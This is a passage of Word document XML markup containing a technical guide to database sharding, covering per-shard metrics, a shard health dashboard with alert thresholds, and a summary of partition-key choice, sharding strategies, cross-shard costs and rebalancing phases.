      <w:r w:rsidRPr="00875520">
        <w:t>Storage metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF91800" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  storage_used_bytes{shard="shard_1"}: 234GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1AA15A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  storage_used_pct{shard="shard_1"}: 72%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACBC28" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Alert: &gt; 80% triggers rebalancing planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB28CA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F18BA8E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9A617" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  qps{shard="shard_1", query_type="read"}: 45,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1725854B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  qps{shard="shard_1", query_type="write"}: 12,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157745EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  query_latency_p99{shard="shard_1"}: 8ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC220A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016AE602" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Imbalance detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D069791" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    qps_cv = coefficient_of_variation(qps across all shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F18267" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    If qps_cv &gt; 0.3: significant imbalance → investigate hot shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2457A6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294357EB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Replication metrics (per shard, as shards have replicas):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1790A4CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  replication_lag_seconds{shard="shard_1", replica="replica_2"}: 0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230ED218" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9EAE1A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cross-shard query metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0489C496" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  scatter_gather_qps: how many queries require all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34475741" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  scatter_gather_latency_p99: tail latency for scatter-gather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEB2B43" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  cross_shard_transaction_rate: rate of 2PC or saga transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE76A3A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  cross_shard_transaction_abort_rate: aborted distributed transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E31873" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2DC479" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hotspot detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD747D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  key_access_rate{key_prefix="user:12345"}: how often is specific key accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC2D44" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If one key &gt;&gt; average → hotspot → investigate shard strategy or caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749176F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shard Health Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D1BD3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F713582" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Dashboard structure for sharded database cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E9D7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="328C6F0C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Row 1: Cluster Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508CE079" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Total QPS (all shards combined, stacked by shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C55E0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Storage used % (gauge per shard, sorted descending)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC75CFF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Overall p99 latency (worst shard in red)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14478EB0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Number of shards: healthy/total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1839A6B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD9DD5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Row 2: Imbalance Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CEF09" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - QPS distribution (bar chart: all shards side-by-side)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4B1371" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Storage distribution (bar chart: all shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E35DAD2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Latency distribution (heatmap: shards × time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7318A565" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Imbalance score (0-100%: 0=perfect, 100=completely imbalanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138DFE51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49622F2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Row 3: Cross-Shard Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8FC09" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Scatter-gather QPS (rate of queries touching all shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A9B692" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Distributed transaction rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CDB596" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Distributed transaction abort rate (&gt; 1%: investigate conflict rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC1E53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E42009" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Row 4: Rebalancing (if active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADB07D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Data migration rate (bytes/second being moved)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2358A698" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Migration progress (% complete per table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFBE060" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Source shard latency impact (monitoring during migration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB7D78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Estimated completion time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E694015" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC3726" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436C9E9F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  CRITICAL: any shard storage &gt; 90%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E103B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  CRITICAL: any shard latency p99 &gt; 10× baseline (hot shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B91726F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  WARNING: imbalance score &gt; 50% (uneven distribution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E005B5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  WARNING: scatter-gather &gt; 20% of total QPS (over-reliance on scatter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47D47C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  WARNING: distributed transaction abort rate &gt; 5% (conflict hotspot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF69D1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="40D722C5">
          <v:rect id="_x0000_i5863" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B6FC9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C4B55" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2562E980" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sharding = Horizontal Partitioning to Exceed Single-Machine Limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4A372" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">           at the Cost of Distributed Systems Complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1F4559" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="63B4479D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>When to Shard (only after exhausting alternatives):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C3B9D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Write throughput &gt; single-machine limit (~50K TPS PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7A6E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Total data &gt; single-machine storage (~60TB on largest instances)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA3CC9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Working set &gt; single-machine RAM (hot data doesn't fit in buffer pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258AE18F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFBEC36" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  NOT when: read replicas + caching + vertical scaling still have headroom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1B579" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="58BBC556" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The Partition Key Decision (most important, hardest to change):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368E610A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Requirements: high cardinality, even distribution, stable values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D8C96" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Locality: queries that belong together should shard together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617702B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Access pattern: shard key must be present in the majority of queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF6D50" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E015933" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Design test: for each of your top 10 queries, is the shard key in the WHERE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C7C9C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    If yes for 8/10: good shard key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F949F61" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    If yes for 3/10: poor shard key → reconsider before sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B2F5AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1387B27C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sharding Strategy Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D70135" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Range:     efficient range queries, hot spot risk for monotonic keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E563700" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">             good for time-series data, geographical queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C88F8A7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Hash:      uniform distribution, range queries become scatter-gather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB81009" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">             good for general CRUD workloads with point-lookup dominance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094BFC5E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Consistent hash: hash benefits + incremental shard addition (1/N migration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431D667C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">             standard for large clusters (Cassandra, DynamoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F16FB2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Directory: maximum flexibility, extra lookup overhead, operational complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E56F8E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">             good for multi-tenant SaaS (per-tenant isolation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0997655A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1017E05A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cross-Shard Operations (avoid in hot paths):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F068813" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Scatter-gather:    O(N) database work, tail latency amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F47A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Cross-shard JOIN:  potentially O(N×M) — catastrophic, avoid or denormalize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B8F61" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Distributed txn:  +4 RTTs (2PC), blocking on coordinator failure → saga instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208564D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Global aggregates: decomposable (SUM, COUNT, MIN, MAX) vs non-decomposable (DISTINCT, PERCENTILE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E3AE8D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6DAC2452" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The Rebalancing Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA5A77" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Phase 1 (copy):    background data migration, production unaffected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426D9106" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Phase 2 (catchup): apply delta changes, reduce lag to near-zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00616E85" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Phase 3 (cutover): brief pause, atomic routing update, resume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D9A7E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Phase 4 (cleanup): verify, delete old data, update monitoring</w:t>
      </w:r>
    </w:p>
